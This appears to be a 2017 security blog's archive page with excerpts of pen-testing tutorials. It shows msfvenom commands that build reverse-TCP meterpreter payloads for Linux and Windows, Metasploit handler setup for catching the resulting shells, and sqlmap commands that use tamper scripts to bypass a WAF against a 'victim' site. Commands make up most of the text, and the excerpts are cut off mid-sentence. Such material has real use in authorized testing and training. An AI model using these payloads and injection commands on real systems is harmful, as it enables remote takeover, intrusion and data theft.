Skip to main content

Posts

Showing posts from November, 2017

Sql injection to shell

Creating Metasploit Payloads

Creating Metasploit Payloads Metasploit - Most Used Pen Testing Tool Usually when you use metasploit, you need to create a payload and send that payload to your victim. Here is some useful command to create payload for many platform. Acronym for this post: LHOST: local host - commonly is attacker IP LPORT: local port - default is 4444 RHOST: remote host - commonly is victim IP [Handlers] Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z [List payloads] msfvenom -l [Binaries] Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Addr

Advanced Sqlmap - Metasploit for SQL Injection.

Advanced Sqlmap - Metasploit for SQL Injection. [?] What is SQL Injection? I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection [?] Why we use sqlmap? - This is a automatic SQL injection tool. - Provide many advanced technique that I'll show you in this post. - Open source and highly scalable. - Easy to install. [*] Sqlmap source https://github.com/sqlmapproject/sqlmap All you need is python 2.x and Internet connection: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev [*] Well, now I'm gonna show you some advanced technique. [Bypass WAF using sqlmap tamper script] python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs You can also use more tamper script but it depend on your victim DBMS. ( use too much tamper script is not RECOMMEND ) Here is